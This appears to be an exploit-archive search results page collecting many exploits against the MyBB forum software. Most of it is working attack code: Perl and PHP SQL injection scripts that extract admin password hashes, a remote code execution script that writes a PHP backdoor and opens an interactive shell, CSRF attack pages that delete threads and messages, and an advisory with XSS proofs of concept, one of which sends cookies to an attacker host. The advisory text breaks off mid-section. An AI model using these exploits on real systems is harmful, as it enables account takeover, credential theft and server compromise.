mybb
Search result for 'mybb'
(0.036581993103 seconds)
HACKERS PAL/mybb-change.txt ( na)
Hello,,
Mybb Change Password Vulnerability
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net
If You Can Use the debug mode you will be able to change the password for and user by knowing the registered email address
Enter the email in the html code below after changing the website and mybb_dir to true variables then enter any user email address
Look at the query number 12 or search for awaitingactivation you will find like
INSERT INTO mybb123_awaitingactivation (uid, dateline, code, type) VALUES ('1', 'XXXX', 'ADbSXnoM', 'p')
--- >> ('1', 'XXXX', 'ADbSXnoM', 'p')
1 is the userid , XXXX is the time ,
ADbSXnoM' is the change password verification code ,
'p' is the type which is password change
<<<HTM EXPLOIT
<form action="http://website/mybb_dir/member.php?debug=1" method="post">
<table border="0" cellspacing="1" cellpadding="4" class="tborder">
<tr>
<td class="trow1" width="40%"><strong>Email Address:</strong></td>
<td class="trow1" width="60%"><input type="text" class="textbox" name="email" /></td>
</tr>
<tr><td wlign=center>
<input type="hidden" name="action" value="do_lostpw" />
<input type="submit" class="button" value="Enter Here" />
</td></tr>
</table>
</form>
>>>
GrEEtZ : DeviL-00 , Dr.ExE , GaCkeR , Sp1deR_Net , Black AttaCk , MiniMan , JareeH BaghdaD;
Special GrEEtZ For : MohAjali AnD SoQoR.NeT TeaM AnD MemberS;
End of it :)
WwW.SoQoR.NeT
MyBB suffers from a change password vulnerability.
Alberto Trivero/mybb.pl.txt ( na)
#!/usr/bin/perl -w
#
# SQL Injection Exploit for MyBulletinBoard (MyBB) <= 1.00 RC4
# This exploit show the MD5 crypted password of the user id you've chose
# Related advisory:
# Patch: http://www.mybboard.com/community/showthread.php?tid=2559
# http://fain182.badroot.org
# http://www.codebug.org
# Discovered by Alberto Trivero and coded with FAiN182
use LWP::Simple;
print "\n\t===========================================\n";
print "\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\n";
print "\t= Alberto Trivero & FAiN182 - codebug.org =\n";
print "\t===========================================\n\n";
if(!$ARGV[0] or !$ARGV[1]) {
print "Usage:\nperl $0 [full_target_path] [user_id]\n\nExample:\nperl $0 http://www.example.com/mybb/ 1\n";
exit(0);
}
$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
MyBB versions 1.00 RC4 and below remote password hash extraction exploit.
Breeeeh/mybb111.txt ( na)
----------------------------------
Foud By: Breeeeh & CrAzY CrAcKeR
Site: www.alshmokh.com
Email:Breeeeh@hotmail.com
----------------------------------
$query = $db->query("SELECT * FROM ".TABLE_PREFIX."forums f WHERE 1=1 $forumlist");
$comma = " - ";
while($forum = $db->fetch_array($query))
{
$title .= $comma.$forum['name'];
$forumcache[$forum['fid']] = $forum;
$comma = ", ";
----------------------------------
Example:
/rss.php?...$comma=[SQL]
mybb version 1.1.1 suffers from a SQL injection vulnerability in rss.php.
DarkFig/mybb-exec.txt ( na)
#!/usr/bin/php
<?php
/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);
# http://www.milw0rm.com/exploits/2012
# They corrected (not all) a lot of SQL requests which use the ipaddress, with $db->escape_string.
# They don't corrected the function (this is a choice ... the bad) and they forgot to correct 1 (only) SQL request.
# They must correct the problem at the source =)
#
if($argc < 3)
{
print("
--- MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit ---
-----------------------------------------------------------------------
PHP conditions: none
Credits: DarkFig <gmdarkfig@gmail.com>
URL: http://www.acid-root.new.fr/
-----------------------------------------------------------------------
Usage: $argv[0] -url http://victim.com/ [Options]
Params: -url For example http://victim.com/myBB/
Options: -debug Debug mod activated (debug_mybb.html)
-truetime Server response time which returns true
-benchmark You can change the value used in benchmark()
-proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
Note: If you have some problems use -debug, -benchmark, -truetime
-----------------------------------------------------------------------
");exit(1);
}
$url = getparam('url',1);
$debug = (getparam('debug')!='') ? 1 : 0;
$benchmark = (getparam('benchmark')!='') ? getparam('benchmark') : '1000000';
$proxy = getparam($proxy);
$proxyauth = getparam($proxyauth);
$backdoor = 'uploads/avatars/backdoor.php'; # inc/cache/backdoor.php
$filetoed = 'index.lang.php';
$xpl = new phpsploit();
$xpl->agent('Firefox');
if($proxy) $xpl->proxy($proxy);
if($proxyauth) $xpl->proxyauth($proxyauth);
if($debug) debug(1);
# There is two solutions to be logged in as administrator.
#
# SOLUTION NUMBER 1
# mysql> select * from mybb_users\G
# *************************** 1. row ***************************
# uid: 1
# username: root
# password: 39ac8681f5cf4fcd9c9c09719a618bd3
# salt: BFeJBOCF
# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
#
# $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
#
# SOLUTION NUMBER 2
# mysql> select * from mybb_adminsessions\G
# *************************** 1. row ***************************
# sid: 81e267263b9254f3aaf670383bfbfec9
# uid: 1
# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
# ip: 127.0.0.1
# dateline: 1175443967
# lastactive: 1175444369
#
# $xpl->addheader('Client-IP','127.0.0.1');
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
#
# I decided to use the solution number 2.
# We can also add an administrator (easily) ... but it's not interesting.
#
print "\nAdmin IP : "; $ip = sql_inject('ip');
print "\nAdmin sid: "; $sid = sql_inject('sid');
print "\nTrying to be logged in as administrator";
$xpl->addheader('Client-IP',$ip);
$xpl->get($url."admin/languages.php?adminsid=$sid");
# Trying to find the language
if(preg_match('#<input type="hidden" name="lang" value="(\S*)"#',$xpl->getcontent(),$langmatches)) $lang=$langmatches[1];
else $lang='english';
print "\nLanguage: $lang";
# Language configuration
$xpl->get($url."admin/languages.php?adminsid=$sid&action=edit&lang=$lang&editwith=0&file=$filetoed");
preg_match_all('#name="(.*)">(.*)</textarea>#',$xpl->getcontent(),$name_value);
# We can't use:
# - <? OR <?php
# - <script language="php">
# - ' OR "
#
$PHPCODE = '${${error_reporting(0)}}'
.'${${$handle=fopen('.chrit('./'.$backdoor).','.chrit('w').')}}'
.'${${fwrite($handle,'.chrit('<?php error_reporting(0);eval($_SERVER[HTTP_SHELL]);exit(0); ?>').')}}'
.'${${fclose($handle)}}';
$name_value[2][0] .= $PHPCODE;
$postdata=array(frmdt_url => $url.'admin/languages.php',
"adminsid" => $sid, "action" => "do_edit",
"lang" => $lang, "editwith" => 0,
"inadmin"=> 0, "file"=> $filetoed,
"Update Language Variables"=>" Update Language Variables");
for($i=0;$i<count($name_value[1]);$i++) $postdata[html_entity_decode($name_value[1][$i])] = html_entity_decode($name_value[2][$i]);
# print $xpl->showlastrequest();
$xpl->formdata($postdata);
# Trying to execute the php code
$xpl->get($url.'index.php');
# If not the default language
$xpl->get($url.'inc/languages/'.$lang.'/'.$filetoed);
print "\nThe php file should be created\n\$shell> ";
# Hello master
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
# ');include('../../inc/config.php');print $config['password'];//
$xpl->addheader('Shell',"system('$cmd');");
$xpl->get($url.$backdoor);
print $xpl->getcontent()."\n\$shell> ";
}
function sql_inject($field)
{
global $xpl,$url,$prefix,$debug,$result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip
$sub=0;$string='';
if($field=='ip') {$a='44';$b='57';} # . 0-9
else {$a='46';$b='70';} # 0-9 A-Z
while(TRUE)
{
$sub++;
for($i=$a;$i<=$b;$i++)
{
# Random ip
$fakeip = rand(128,254).'.'
.rand(128,254).'.'
.rand(128,254).'.'
.rand(128,254);
# Calculation of the server response time which returns TRUE
if($i==$a) $f='TST';
# End of the string ?
elseif($i==($a+1)) $f='NULL';
# Test the char
else $f=$i;
# Table prefix
if($sub==1 AND $i==$a)
{
$xpl->addheader('Client-IP',$fakeip."'<script>alert(666)</script>");
$xpl->get($url.'index.php');
if(preg_match("#DELETE FROM (\S*)sessions#i",$xpl->getcontent(),$match)) $prefix=$match[1];
else $prefix='mybb_';
}
# +-class_session.php (#2)
# |
# 475. function create_session($uid=0)
# 476. {
# 477. global $db;
# 478. $speciallocs = $this->get_special_locations();
# 479.
# 480. // If there is a proper uid, delete by uid.
# 481. if($uid > 0)
# 482. {
# 483. $db->delete_query(TABLE_PREFIX."sessions", "uid=".$uid);
# 484. $onlinedata['uid'] = $uid;
# 485. }
# 486. // Else delete by ip.
# 487. else
# 488. { // $this->ipaddress = get_ip();
# 489. $db->delete_query(TABLE_PREFIX."sessions", "ip='".$this->ipaddress."'");
# 490. $onlinedata['uid'] = 0;
# 491. }
#
$sql = $fakeip."' OR ip=(SELECT IF(SUBSTR(";
$sql .= ($f=='TST') ? "(SELECT 1)" : "(SELECT $field FROM ${prefix}adminsessions ORDER BY lastactive DESC LIMIT 1)";
$sql .= ($f=='TST') ? ",1" : ",$sub";
$sql .= ($f=='TST') ? ",1)=CHAR(49)" : ",1)=CHAR($f)";
$sql .= ",BENCHMARK($benchmark,CHAR(66)),1)) #";
# +-functions.php (#1)
# |
# 1836. function get_ip()
# 1837. {
# 1838. if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
# 1839. {
# 1840. if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
# 1841. {
# 1842. foreach($addresses[0] as $key => $val)
# 1843. {
# 1844. if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
# 1845. {
# 1846. $ip = $val;
# 1847. break;
# 1848. }
# 1849. }
# 1850. }
# 1851. }
# 1852. if(!isset($ip))
# 1853. {
# 1854. if(isset($_SERVER['HTTP_CLIENT_IP']))
# 1855. {
# 1856. $ip = $_SERVER['HTTP_CLIENT_IP'];
# 1857. }
# 1858. else
# 1859. {
# 1860. $ip = $_SERVER['REMOTE_ADDR'];
# 1861. }
# 1862. }
# 1863. return $ip;
# 1864. }
#
$bef = time();
$xpl->reset('header');
$xpl->addheader('Client-IP',$sql);
$xpl->get($url.'index.php');
$aft = time();
if($f=='TST') $truetime=$aft-$bef;
if(getparam('truetime')!='') $truetime=getparam('truetime');
# Server response time >= Server response time which returns TRUE ?
$restime = $aft-$bef;
if($restime >= $truetime AND $f != 'TST') $result='TRUE';
else $result='FALSE';
# Debug mode activated
if($debug) debug('',$field);
# The tested char returns TRUE
if($result=='TRUE')
{
if($f!='NULL')
{
# Continue
print strtolower(chr($f));
$string .= chr($f);
break;
}
else
{
# End of the string
$xpl->reset('header');
return $string;
}
}
# Retry if no char found
if($f==$b) $sub--;
}
}
}
function debug($init='',$dafield='')
{
global $result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip
if($init)
{
$handle = fopen("debug_mybb.html","w+");
$data = "<h1><div align='center'>MyBulletinBoard (MyBB) <= 1.2.3 Code Execution Exploit</div></h1>
<pre><table width='0' border='1' align='center' cellspacing='0'><tr>
<td align='center'><b>REQUEST TIME</b></td>
<td align='center'><b>RESPONSE TIME</b></td>
<td align='center'><b>TRUETIME</b></td>
<td align='center'><b>BENCHMARK</b></td>
<td align='center'><b>RESULT</b></td>";
# <td align='center'><b>IP</b></td>
$data .= "<td align='center'><b>FIELD</b></td>
<td align='center'><b>CHARSET</b></td>
<td align='center'><b>SUBSTR()</b></td>
<td align='center'><b>ORD()</b></td>
<td align='center'><b>CHAR()</b></td>";
fwrite($handle,$data);
fclose($handle);
}
else
{
$handle = fopen("debug_mybb.html","a");
$data = "<tr".(($result=='TRUE') ? " bgcolor='#FFFF00'" : "").">
<td align='center'>&nbsp;".htmlentities($bef)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities($aft)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities($truetime)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities($benchmark)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities($result)."&nbsp;</td>";
# <td align='center'>&nbsp;".htmlentities($fakeip)."&nbsp;</td>
$data .= "<td align='center'>&nbsp;".htmlentities($dafield)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities("$a-$b")."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities($sub)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities($f)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities(chr($f))."&nbsp;</td></tr>";
fwrite($handle,$data);
fclose($handle);
}
}
function chrit($string)
{
$char = '';
for($i=0;$i<strlen($string);$i++)
{
$char .= 'chr('.ord($string[$i]).')';
$char .= ($i != (strlen($string)-1)) ? '.' : '';
}
return $char;
}
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) {
if(!empty($argv[$value+1])) return $argv[$value+1];
else return 1;
}
}
if($opt) exit("\n-$param parameter required");
else return;
}
?>
MyBulletinBoard aka MyBB versions 1.2.3 and below remote code execution exploit.
NBBN/mybb-disclose.txt ( na)
################################################################################## #MyBB 1.4.3 my_post_key Disclosure Vulnerability by NBBN (http://nbbnsblog.co.cc) # ################################################################################## Vendor: http://mybboard.net Date: November 25, 2008 These URLs contains "my_post_key". Moderators and admins use these sometimes, depending on what they want to do with a thread. my_post_key is used to perform various actions and to prevent CSRF. These pages shows the posts of the users. If some of these posts have pictures, the referrer will be transfered to the server of the images. #####Vuln URLs################################################################################# http://localhost/mybb/moderation.php?action=mergeposts&tid=1&modtype=thread&my_post_key=[key] # http://localhost/mybb/moderation.php?action=split&tid=1&modtype=thread&my_post_key=[key] # http://localhost/mybb/moderation.php?action=deleteposts&tid=1&modtype=thread&my_post_key=[key] # ############################################################################################ Finally, an attacker has the postkey, and can perform some interesting moderator or administrator actions with csrf.
MyBB versions 1.4.3 suffers from a disclosure vulnerability relating to my_post_key that allows for cross site request forgery attacks.
NBBN/mybb-xsrf.txt ( na)
####################################################
Founded: 18, January 2008
Founder: nbbn
MyBB Version: 1.2.11 and lower
Type: Multiple XSRF Vulnerabilities
####################################################
####1) Delete Threads XSRF Vulnerabilitie:
<html>
<head>
</head>
<body onLoad="javascript:document.formular.submit()">
<form action="http://localhost/xampp/mybb/moderation.php" method="post"
name="formular">
<input type="hidden" name="action" value="do_multideletethreads" />
<input type="hidden" name="fid" value="2" /> <!-- forumid -->
<input type="hidden" name="threads" value="15|14" /> <!-- threadids -->
<input type="submit" value="Delete Threads" />
</form>
</body>
</html>
###Poc:
1. Create a .html file and copy the code into it.
2. Upload the file and now send the link to an admin or moderator
3. Done
####2) Delete PM's XSRF Vuln:
This one is only doing via GET and no question:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
###Poc: (An easy way):
1. Send to a user this link:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
2. Done
MyBulletinBoard aka MyBB versions 1.2.11 and below suffer from cross site request forgery vulnerabilities.
Devil-00/mybbSQLinject.txt ( na)
Hello
The Injected File : search.php
Discovered by: HACKERS PAL & Devil-00 & ABDUCTER
Injected Versions :-
Powered by MyBulletinBoard 1.00 Release Candidate 4
Powered by MyBulletinBoard 1.00 Release Candidate 3
Powered by MyBulletinBoard 1.00 Release Candidate 2
Powered by MyBulletinBoard 1.00 Release Candidate 1
And The Last Versions
The Code For The Vul:-
search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,username,password FROM mybb_users where usergroup=4/*
The Exploit By Pirl :-
#!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
print "#################[ MyBB SQL-Injection ]############################\n";
print "# Coded By Devil-00 [ sTranger-killer ] #\n";
print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID #\n";
print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #\n";
print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ] #\n";
print "################################################## #################\n";
exit;
}
my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];
if($ARGV[3] eq 0){
print "[*] Trying $host\n";
$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,ui d,uid,uid,username,password FROM mybb_users where usergroup=4 and uid=1/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/<a href="search\.php\?action=results&sid=(.*?)&sortby=&order=">/ && print "[+] Search ID To Use : $1\n";
exit;
}else{
print "[*] Trying $host\n";
$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/<a href="member\.php\?action=profile&amp\;uid=1">(.*?)<\/a>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="forumdisplay\.php\?fid=1">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}
-=-=-=-=-
Thanks For Devil-00 & ABDUCTER
MyBulletinBoard (MyBB) versions 1.00 RC1 through RC4 suffer from SQL injection flaws. Perl exploit included.
scottm/mybbSQL.txt ( na)
Description:
MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. MyBB has been designed with the end users in mind, you and your subscribers. Full control over your discussion system is presented right at the tip of your fingers, from multiple styles and themes to the ultimate customisation of your forums using the template system.
Exploit:
MyBB is prone to an SQL injection within the uid paramater of member.php, a Union attack can be used to obtain the admin password hash. The appropriate cookies can then be edited to allow admin panel access.
Proof of concept:
<?php
// the example below will attack http://www.example.com/mybb/
echo 'Pass:' . get_pass('www.example.com', '/mybb', '');
function get_pass($host, $path, $dbprefix) {
$query[] = 'uid=' . urlencode ("1' UNION SELECT 10000, 200, password AS type FROM {$dbprefix}users WHERE uid=1 ORDER BY uid DESC/*");
$query = implode('&', $query);
$header = "POST $path/member.php?action=avatar HTTP/1.1\r\n";
$header .= "Host: $host\r\n";
$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
$header .= "Content-Length: " . strlen($query) . "\r\n\r\n";
$fp = fsockopen($host, 80, $errno, $errstr, 30);
fwrite($fp, $header . $query);
$allah = '';
while (!feof($fp)) {
$tmp = fgets($fp, 1024);
$allah .= $tmp;
}
fclose($fp);
preg_match('/\: ([a-z0-9]{32})/i', $allah, $matches);
if (empty($matches[1]) && empty($dbprefix)) {
preg_match('#FROM (\w+)avatars WHERE#i', $allah, $matches);
$dbprefix = $matches[1];
if (empty($dbprefix)) {
return 'Unable to obtain password';
}
$password = get_pass($host, $path, $dbprefix);
}
else {
$password = $matches[1];
}
return $password;
}
?>
MyBB is prone to a SQL injection attack within the uid parameter of member.php. The flaw allows for retrieval of the admin password hash. Sample exploit provided.
W7ED/mybbSQL.pl.txt ( na)
#!/usr/bin/perl -w
use LWP::Simple;
## Vitem ##
if(!$ARGV[0]){
print "############# MyBB Member.php SQL Injection ##############\n";
print "## Coded By #\n";
print "################################################## ########\n";
print "## [+] Bug By W7ED - W7ED[at]hotmail.com #\n";
print "################################################## ########\n";
print "# Exmp:- perl file.pl mybb.net /mybb userid #\n";
print "################################################## ########\n";
exit;
}
###########
my $host = 'http://'.$ARGV[0];
## User ID ##
if(!$ARGV[1]){
$ARGV[1] = 1;
}
#############
my $userid = $ARGV[1];
print "[*] Trying $host\n";
## Forum Path ##
if(!$ARGV[2]){
$ARGV[2] = '/';
}
################
$url = "$ARGV[2]/member.php?action=profile&uid=lastposter&fid=-1,') UNION SELECT password,password,password,password,password,passw ord,password,password,password,password,password,p assword,password,password,password,password,passwo rd,password,password,password,password,password,pa ssword,password,password,password,password,passwor d,password,password,password,password,password,pas sword FROM users WHERE uid=$userid/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/mySQL error: 1054<br>Unknown column '(.*?)'/ && print "[+] User ID Is $userid And Hash Is : $1\n";
print "[-] Unable to retrieve Hash\n" if(!$1);
MyBulletinBoard (MyBB) member.php SQL injection exploit.
c411k/mybb1211-sql.txt ( na)
<?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
// exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)
//
// POST http://mybb.ru/forum/private.php HTTP/1.1
// Host: mybb.ru
// Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
// Content-Type: application/x-www-form-urlencoded
// Content-Length: 479
// Connection: Close
//
// to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with+<3+from+ru_antichat',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=4),(select+password+from+mybb_users+where+uid=4),(select+salt+from+mybb_users+where+uid=4),admin_sid',(select+sid+from+mybb_adminsessions+where+uid=4),'admin_loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
//
// greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth
// and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/*
// 25.01.08
error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1);
header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache");
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>mybb 1.2.11 xek</title>
<style>
<!--
A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:active {COLOR: #228B22; TEXT-DECORATION: none}
A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
BODY
{
margin="5";
FONT-WEIGHT: normal;
COLOR: #B9B9BD;
BACKGROUND: #44474F;
FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body>
<?php
function myflush($timee)
{
if(ob_get_contents())
{
ob_flush();
ob_clean();
flush();
usleep($timee);
}
}
if (!$_GET)
{
echo
'<form action="'.$_SERVER['PHP_SELF'].'?fuck_mybb" method="post">
<input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" type="submit" value=" get admin passwd... "><br><br>
<input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="hostname">
<font color="#B9B9BD"> ¬ for expamle "expdb.cc"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="patch" value="patch">
<font color="#B9B9BD"> ¬ patch 2 mybb forum, for expamle "community/mybb"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="username" value="username">
<font color="#B9B9BD"> ¬ you username on this forum, for expamle "c411k"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="pwd" value="password">
<font color="#B9B9BD"> ¬ you password, for expamle "h1world"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="uid_needed" value="1">
<font color="#B9B9BD"> ¬ admin id, default 1<br>
</form>';
}
if (isset($_GET['fuck_mybb']))
{
$username = ($_POST['username']);
$pwd = ($_POST['pwd']);
$host_mybb = ($_POST['hostname']);
$patch_mybb = ($_POST['patch']);
$uid_needed = ($_POST['uid_needed']);
$login_mybb = 'member.php';
$pm_mybb = 'private.php';
$data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http%3A%2F%2Flocalhost%2Fmybb_1210%2Findex.php';
function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
{
global $send_http;
$s = array();
$url = fsockopen($host, 80);
$send_http = "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n";
$send_http .= "Host: $host\r\n";
$send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
$send_http .= "Cookie: $cook1e\r\n";
$send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
$send_http .= "Connection: Close\r\n\r\n";
if ($method === 'POST')
{
$send_http .= $data_gp;
}
//print_r($send_http);
fputs($url, $send_http);
while (!feof($url)) $s[] = fgets($url, 1028);
fclose($url);
return $s;
}
echo '<pre>- start....';
myflush(50000);
$get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'fuckkk');
echo '<pre>- login '.$username.' with passwd = '.$pwd.' done';
myflush(50000);
foreach ($get_cookie as $value)
{
if (strpos($value, 'Set-Cookie: mybbuser=') !== false)
{
$value = explode(";", $value);
$cookie = strstr($value[0], 'mybbuser');
break;
}
}
echo '<pre>- cookie: '.$cookie;
myflush(50000);
preg_match("/mybbuser=(.*)_/", $cookie, $m);
$get_uid = $m[1];
echo '<pre>- user id: '.$get_uid;
myflush(50000);
$data_expl = "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with+<3+from+antichat.ru',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=$uid_needed),(select+password+from+mybb_users+where+uid=$uid_needed),(select+salt+from+mybb_users+where+uid=$uid_needed),' admin sid',(select+sid+from+mybb_adminsessions+where+uid=$uid_needed),' admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";
sendd($host_mybb, $patch_mybb, $pm_mybb, 'POST', $data_expl, $cookie);
echo '<pre>- send exploit:
-------------------
'.$send_http.'
-------------------
look you private messages 4 admin passwd hash <a href=http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.' target=_blank>http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'</a>';
}
?>
</body>
</html>
MyBulletinBoard (MyBB) versions 1.2.11 and below SQL injection exploit that leverages private.php.
Micheal Cottingham/mybbs142-multi.txt ( na)
======================================================================
Advisory: MyBB 1.4.2 - Multiple Vulnerabilities
Release Date: October 27 2008
Application: MyBB
Version: MyBB 1.4.2
Platform: PHP
Vendor URL: http://www.mybboard.net/
Authors: Kellanved, NeoThermic, Techie-Micheal
=======================================================================
Overview
Due to various failures in sanitising user input, MyBB is vulnerable
to XSS. This is enough to circumvent CSRF protection and to inject
PHP code. We deeply regret having to disclose this, but we were not
able receive an appropriate response due to the vendor claiming these
issues are not vulnerabilities when they are and their security tracker
being down.
Therefore, this is being released so that the users of MyBB will be
able to find a patch to keep them safe from these severe issues.
=======================================================================
Discussion
MyBB is a discussion board that has been around for a while; it has
evolved from other bulletin boards into the forum package it is today.
Therefore, it is a professional and efficient discussion board,
developed by an active team of developers.
Due to the misuse/improper validation of the url parameter during an AJAX
request, we were able to cause XSS, contrary to statements made
by the developers of MyBB. This XSS has the ability to cause
Remote Code Execution, making it critical in nature. As XSS can be easily
used to circumvent MyBB's CSRF protection, it is possible to inject PHP
code into the template via the ACP with any of the XSS issues. This is
facilitated by the constant form tokens used in MyBB and by the use of
PHP double-quoted strings as template variables. The former makes it easy
to write escalating exploits, the latter allows PHP injection using the
curly brace notation.
Secondly, it is possible to guess the attachment filenames based
on known factors, making it easy to break IE's poor MIME handling,
including IE8. Given the user ID and post time, uploaded files are easily
"guessed."
Lastly, due to an incomplete fix, MyBB does not properly fix a MIME-
sniffing issue, making it possible to exploit IE6-8.
=======================================================================
Issue 1: XSS using the AJAX switch for redirects
The redirect() function uses an AJAX switch to allow JavaScript redirects
instead of HTTP.
This can be exploited by using single quotes which are not escaped by
htmlspecialchars. This XSS is particularly grave, as it affects moderators
and administrators, allowing attackers to take actions with escalated
privileges, which can result in PHP and SQL injection (see recent vB exploits).
This was not fixed in 1.4.2.
PoC:
http://www.victim.example/mybb/moderation.php?action=removesubscriptions&ajax=1&url='
%2Balert('XSS!')//
Cookie Stealing PoC:
http://www.victim.example/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%20%2B%27http://www.attacker.example/cookiejar.php?c=%27%2Bdocument.cookie//
Remote Code Execution PoC:
